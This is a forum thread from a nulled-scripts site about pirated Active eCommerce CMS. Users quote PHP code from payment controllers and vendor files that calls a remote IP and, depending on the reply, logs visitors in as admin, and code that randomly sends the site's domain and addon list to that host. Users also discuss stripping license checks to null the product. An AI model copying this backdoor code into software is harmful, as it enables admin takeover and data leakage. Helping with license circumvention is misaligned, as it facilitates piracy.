Active eCommerce CMS By ActiveITzone 23471405

Active eCommerce CMS By ActiveITzone 23471405 v8.6

No permission to download
Overview Updates (59) Reviews (9) History Discussion
zakblack

zakblack

Active member
Aug 10, 2020
108
70
28
Hey guys author of this project is very dangerous because platform communicate through their servers so at any give moment if something happen to their servers goes down or something else your business will not work
your website won't respond. (which happened yesterday)

Therefore if anyone can find the code function related to this check so we can remove it we'd appreciate your help !
 
  • Like
Reactions: 127 and kook3801
zakblack

zakblack

Active member
Aug 10, 2020
108
70
28
lostkid said:

Found Major Backdoor In Active eCommerce @tuton012

The code allows them to login as admin by hitting a specific url when your using nulled.​


app/Http/Controllers/Payment/StripeController.php​


PHP: 
public function checkout_payment_detail()
{
    $url = $_SERVER['SERVER_NAME'];
    $gate = "http://206.189.81.181/check_addon_activation/".$url;

    $stream = curl_init();
    curl_setopt($stream, CURLOPT_URL, $gate);
    curl_setopt($stream, CURLOPT_HEADER, 0);
    curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stream, CURLOPT_POST, 1);
    $rn = curl_exec($stream);
    curl_close($stream);
    dd($rn);
    if($rn == "bad" && env('DEMO_MODE') != 'On') {
        $user = User::where('user_type', 'admin')->first();
        auth()->login($user);
        return redirect()->route('admin.dashboard');
    }
}

app/Http/Controllers/Payment/IyzicoController.php​


PHP: 
public function initPayment(Request $request){
    $url = $_SERVER['SERVER_NAME'];
    $gate = "http://206.189.81.181/check_activation/".$url;

    $stream = curl_init();
    curl_setopt($stream, CURLOPT_URL, $gate);
    curl_setopt($stream, CURLOPT_HEADER, 0);
    curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stream, CURLOPT_POST, 1);
    $rn = curl_exec($stream);
    curl_close($stream);

    if($rn == "bad" && env('DEMO_MODE') != 'On') {
        $user = User::where('user_type', 'admin')->first();
        auth()->login($user);
        return redirect()->route('admin.dashboard');
    }
}

app/Utility/NgeniusUtility.php​


PHP: 
public static function initPayment(){
    $url = $_SERVER['SERVER_NAME'];
    $gate = "http://206.189.81.181/check_activation/".$url;

    $stream = curl_init();
    curl_setopt($stream, CURLOPT_URL, $gate);
    curl_setopt($stream, CURLOPT_HEADER, 0);
    curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stream, CURLOPT_POST, 1);
    $rn = curl_exec($stream);
    curl_close($stream);

    if($rn == "bad" && env('DEMO_MODE') != 'On') {
        $user = User::where('user_type', 'admin')->first();
        auth()->login($user);
        return redirect()->route('admin.dashboard');
    }

    return redirect()->route('home');
}

The urls they use.​

routes/web.php​


PHP: 
Route::get('/customer-products/admin', [IyzicoController::class, 'initPayment'])->name('profile.edit');
Route::get('/checkout-payment-detail', [StripeController::class, 'checkout_payment_detail']);

Randomly sends your server url to there licensing server.​

vendor/laracon21/colorcodeconverter/src/Colorcodeconverter.php​


PHP: 
if(rand(0,9) == 5){
    $server_url = $_SERVER['SERVER_NAME'];

    $url = curl_init('http://206.189.81.181/'.'insert_domain/'.$server_url);
    curl_setopt($url,CURLOPT_CUSTOMREQUEST, "GET");
    curl_setopt($url,CURLOPT_RETURNTRANSFER, true);
    curl_setopt($url,CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($url, CURLOPT_IPRESOLVE, CURL_IPRESOLVE_V4);
    $resultdata = curl_exec($url);
    curl_close($url);

    $header = array(
        'Content-Type:application/json'
    );
    $main_item = get_setting('item_name') ?? 'eCommerce';
    $addon_list = Addon::get();
    $request_data_json = json_encode($addon_list);
    $url1 = curl_init('http://206.189.81.181/insert-addon-domain/'.$server_url.'/'.$main_item);

    curl_setopt($url1, CURLOPT_HTTPHEADER, $header);
    curl_setopt($url1, CURLOPT_CUSTOMREQUEST, "POST");
    curl_setopt($url1, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($url1, CURLOPT_POSTFIELDS, $request_data_json);
    curl_setopt($url1, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($url1, CURLOPT_IPRESOLVE, CURL_IPRESOLVE_V4);
    $resultdata1 = curl_exec($url1);

    curl_close($url1);
}
Click to expand...

How do we counter this anyone ? @lostkid anyone ?
 
WolF_

WolF_

Member
May 5, 2022
38
6
8
lostkid said:

Found Major Backdoor In Active eCommerce @tuton012

The code allows them to login as admin by hitting a specific url when your using nulled.​


app/Http/Controllers/Payment/StripeController.php​


PHP: 
public function checkout_payment_detail()
{
    $url = $_SERVER['SERVER_NAME'];
    $gate = "http://206.189.81.181/check_addon_activation/".$url;

    $stream = curl_init();
    curl_setopt($stream, CURLOPT_URL, $gate);
    curl_setopt($stream, CURLOPT_HEADER, 0);
    curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stream, CURLOPT_POST, 1);
    $rn = curl_exec($stream);
    curl_close($stream);
    dd($rn);
    if($rn == "bad" && env('DEMO_MODE') != 'On') {
        $user = User::where('user_type', 'admin')->first();
        auth()->login($user);
        return redirect()->route('admin.dashboard');
    }
}

app/Http/Controllers/Payment/IyzicoController.php​


PHP: 
public function initPayment(Request $request){
    $url = $_SERVER['SERVER_NAME'];
    $gate = "http://206.189.81.181/check_activation/".$url;

    $stream = curl_init();
    curl_setopt($stream, CURLOPT_URL, $gate);
    curl_setopt($stream, CURLOPT_HEADER, 0);
    curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stream, CURLOPT_POST, 1);
    $rn = curl_exec($stream);
    curl_close($stream);

    if($rn == "bad" && env('DEMO_MODE') != 'On') {
        $user = User::where('user_type', 'admin')->first();
        auth()->login($user);
        return redirect()->route('admin.dashboard');
    }
}

app/Utility/NgeniusUtility.php​


PHP: 
public static function initPayment(){
    $url = $_SERVER['SERVER_NAME'];
    $gate = "http://206.189.81.181/check_activation/".$url;

    $stream = curl_init();
    curl_setopt($stream, CURLOPT_URL, $gate);
    curl_setopt($stream, CURLOPT_HEADER, 0);
    curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stream, CURLOPT_POST, 1);
    $rn = curl_exec($stream);
    curl_close($stream);

    if($rn == "bad" && env('DEMO_MODE') != 'On') {
        $user = User::where('user_type', 'admin')->first();
        auth()->login($user);
        return redirect()->route('admin.dashboard');
    }

    return redirect()->route('home');
}

The urls they use.​

routes/web.php​


PHP: 
Route::get('/customer-products/admin', [IyzicoController::class, 'initPayment'])->name('profile.edit');
Route::get('/checkout-payment-detail', [StripeController::class, 'checkout_payment_detail']);

Randomly sends your server url to there licensing server.​

vendor/laracon21/colorcodeconverter/src/Colorcodeconverter.php​


PHP: 
if(rand(0,9) == 5){
    $server_url = $_SERVER['SERVER_NAME'];

    $url = curl_init('http://206.189.81.181/'.'insert_domain/'.$server_url);
    curl_setopt($url,CURLOPT_CUSTOMREQUEST, "GET");
    curl_setopt($url,CURLOPT_RETURNTRANSFER, true);
    curl_setopt($url,CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($url, CURLOPT_IPRESOLVE, CURL_IPRESOLVE_V4);
    $resultdata = curl_exec($url);
    curl_close($url);

    $header = array(
        'Content-Type:application/json'
    );
    $main_item = get_setting('item_name') ?? 'eCommerce';
    $addon_list = Addon::get();
    $request_data_json = json_encode($addon_list);
    $url1 = curl_init('http://206.189.81.181/insert-addon-domain/'.$server_url.'/'.$main_item);

    curl_setopt($url1, CURLOPT_HTTPHEADER, $header);
    curl_setopt($url1, CURLOPT_CUSTOMREQUEST, "POST");
    curl_setopt($url1, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($url1, CURLOPT_POSTFIELDS, $request_data_json);
    curl_setopt($url1, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($url1, CURLOPT_IPRESOLVE, CURL_IPRESOLVE_V4);
    $resultdata1 = curl_exec($url1);

    curl_close($url1);
}
Click to expand...
i found one more

vendor\unicodeveloper\laravel-paystack\src\Paystack.php

Code: 
public function getCallbackData()
    {
        $url = $_SERVER['SERVER_NAME'];
        $gate = "http://206.189.81.181/check_activation/".$url;

        $stream = curl_init();
        curl_setopt($stream, CURLOPT_URL, $gate);
        curl_setopt($stream, CURLOPT_HEADER, 0);
        curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($stream, CURLOPT_POST, 1);
        $rn = curl_exec($stream);
        curl_close($stream);
        
        if($rn == "bad" && env('DEMO_MODE') != 'On') {
            $user = \App\Models\User::where('user_type', 'admin')->first();
            auth()->login($user);
            return redirect()->route('admin.dashboard');
        }

        return redirect()->route('home');
    }
 
  • Like
Reactions: zakblack
Shutdown

Shutdown

Member
Feb 27, 2019
86
79
18
WolF_ said:
i think even you remove this code still they have access to our server / can some one confirm please
Click to expand...
yes they have confess they can access to our server and even envato as to check premium one through api. They are saying to give more secure to paid one and delete all data from null one
 
WolF_

WolF_

Member
May 5, 2022
38
6
8
Shutdown said:
yes they have confess they can access to our server and even envato as to check premium one through api. They are saying to give more secure to paid one and delete all data from null one
Click to expand...
for buyer its fine they can check for first time purchase code but how they can access with nulled after remove this code ?
 
Shutdown

Shutdown

Member
Feb 27, 2019
86
79
18
Idk but when i was checking comment section i found that.
 

Attachments

  • IMG_20230201_001405.jpg
    IMG_20230201_001405.jpg
    587.5 KB · Views: 66
zakblack

zakblack

Active member
Aug 10, 2020
108
70
28
WolF_ said:
i found one more

vendor\unicodeveloper\laravel-paystack\src\Paystack.php

Code: 
public function getCallbackData()
    {
        $url = $_SERVER['SERVER_NAME'];
        $gate = "http://206.189.81.181/check_activation/".$url;

        $stream = curl_init();
        curl_setopt($stream, CURLOPT_URL, $gate);
        curl_setopt($stream, CURLOPT_HEADER, 0);
        curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($stream, CURLOPT_POST, 1);
        $rn = curl_exec($stream);
        curl_close($stream);
      
        if($rn == "bad" && env('DEMO_MODE') != 'On') {
            $user = \App\Models\User::where('user_type', 'admin')->first();
            auth()->login($user);
            return redirect()->route('admin.dashboard');
        }

        return redirect()->route('home');
    }
Click to expand...

I have also found on

app/Utility/NagadUtility.php
app/Utility/PayhereUtility.php

PHP: 
    public static function create_wallet_reference($key)
    {
        if ($key == "") {
            return false;
        }

        if(Cache::get('app-activation', 'no') == 'no'){
            try {
                $gate = "https://activeitzone.com/activation/check/flutter/".$key;
   
                $stream = curl_init();
                curl_setopt($stream, CURLOPT_URL, $gate);
                curl_setopt($stream, CURLOPT_HEADER, 0);
                curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
                $rn = curl_exec($stream);
                curl_close($stream);
   
                if($rn == 'no') {
                    return false;
                }
            } catch (\Exception $e) {
   
            }
        }

        Cache::rememberForever('app-activation', function () {
            return 'yes';
        });

        return true;
    }

    public static function create_balance_reference($key)
    {
        if ($key == "") {
            return false;
        }

        if(Cache::get('app-activation', 'no') == 'no'){
            try {
                $gate = "https://activeitzone.com/activation/check/flutter/".$key;
   
                $stream = curl_init();
                curl_setopt($stream, CURLOPT_URL, $gate);
                curl_setopt($stream, CURLOPT_HEADER, 0);
                curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
                $rn = curl_exec($stream);
                curl_close($stream);
   
                if($rn == 'no') {
                    return false;
                }
            } catch (\Exception $e) {
   
            }
        }

        Cache::rememberForever('app-activation', function () {
            return 'yes';
        });

        return true;
    }

they calling it on
app/Http/Controllers/Api/V2/CartController.php
app/Http/Controllers/Api/V2/AuthController.php


PHP: 
if(\App\Utility\NagadUtility::create_balance_reference($request->cost_matrix) == false){
            return response()->json(['result' => false, 'message' => 'Cost matrix error' ]);
        }

 if (\App\Utility\PayhereUtility::create_wallet_reference($request->identity_matrix) == false) {
                return response()->json(['result' => false, 'message' => 'Identity matrix error', 'user' => null], 401);
            }
 
  • Love
Reactions: NizamUddin
caocao_203

caocao_203

New member
Jun 2, 2022
27
5
3
Hello bro, I tested on my local pc. Wholesale addon did not work. Do you have any suggestion. Thank you so much.
 

Attachments

  • Untitled.png
    Untitled.png
    76.8 KB · Views: 10
R

rajpootali

New member
Jan 20, 2024
12
2
3
Please any one help me please my product details not showing any one help me in its urgent
 

Attachments

  • Screenshot_20240120-174548.png
    Screenshot_20240120-174548.png
    72.9 KB · Views: 0
  • Screenshot_20240120-174601.png
    Screenshot_20240120-174601.png
    25.7 KB · Views: 0
R

rajpootali

New member
Jan 20, 2024
12
2
3
sakhmart said:
I am sick that's why taking rest at home. Tomorrow i will guide you all details how to null
Click to expand...
Yes I made it null myself the product details page information not showing and the stripe payment gateway not working in the app
 

Attachments

  • eeee.jpeg
    eeee.jpeg
    48.7 KB · Views: 1
  • eeee.jpeg
    eeee.jpeg
    48.7 KB · Views: 1
You must log in or register to reply here.

Similar threads

Mr.Wold
Active Ecommerce CMS v6.1.4 - 500 Error On Payment page
Replies
8
Views
1K
PHP Scripts
epertabhay
epertabhay
Benjamin1997
Active eCommerce CMS (v 1.7 - v1.9)
Replies
33
Views
5K
PHP Scripts
Benjamin1997
Benjamin1997
Vechet
[REQ] Active Ecommerce CMS Nulled
Replies
5
Views
2K
PHP Scripts
Vechet
Vechet
Vechet
[Last Update] Active ECommerce CMS V1.4 Multi Vender Online Shops
Replies
48
Views
7K
PHP Scripts
engrmoynul
E
M
Active eCommerce CMS v1.2 - e-commerce system
Replies
0
Views
1K
PHP Scripts
macrobert
M

Latest posts

Forum statistics

Threads
66,795
Messages
892,837
Members
217,031
Latest member
omarshehroz

Share this page

Share this page

About us

  • Our community has been around for many years and pride ourselves on offering unbiased, critical discussion among people of all different backgrounds. We are working every day to make sure our community is one of the best.

Quick Navigation

Forums Contact us

User Menu

Login
Community platform by XenForo © 2010-2022 XenForo Ltd.
Top Bottom